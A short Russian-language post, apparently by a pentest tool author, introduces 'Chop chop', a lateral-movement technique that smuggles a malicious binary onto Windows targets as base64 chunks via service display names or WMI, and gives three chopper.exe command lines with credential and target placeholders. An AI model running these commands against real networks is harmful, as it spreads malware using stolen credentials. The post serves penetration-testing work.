
выполнять атаку бокового перемещения, используя отображаемое имя нефильтрованных служб для протаскивания двоичных файлов частями на целевую машину
Недавно я обнаружил новый метод и дал ему прозвище (Chop chop) для выполнения горизонтального перемещения с использованием отображаемых имен служб Windows и WMI путем скрытной передачи вредоносного двоичного файла в виде блоков base64 и автоматизации процесса с помощью инструмента TChopper.
изображение
Если же вы осуществляете горизонтальное перемещение с помощью техники WMI, вы также можете использовать Chopper для этого:
изображение
#chop chop mode
chopper.exe -s -u USERNAME -p PASSWORD -d DOMAIN -f BINARYLOCAL PATH
# chop chop done
chopper.exe -m -u USERNAME -p PASSWORD -d DOMAIN -f BINARYLOCAL PATH
# use WMI to smuggle
chopper.exe -w -u DOMAIN\USERNAME -p PASSWORD -t MACHINE -f LOCALBINARYPATH
Я создаю инструменты для тестирования на проникновение для сообщества open-source, поддержите меня https://paypal.me/0xsp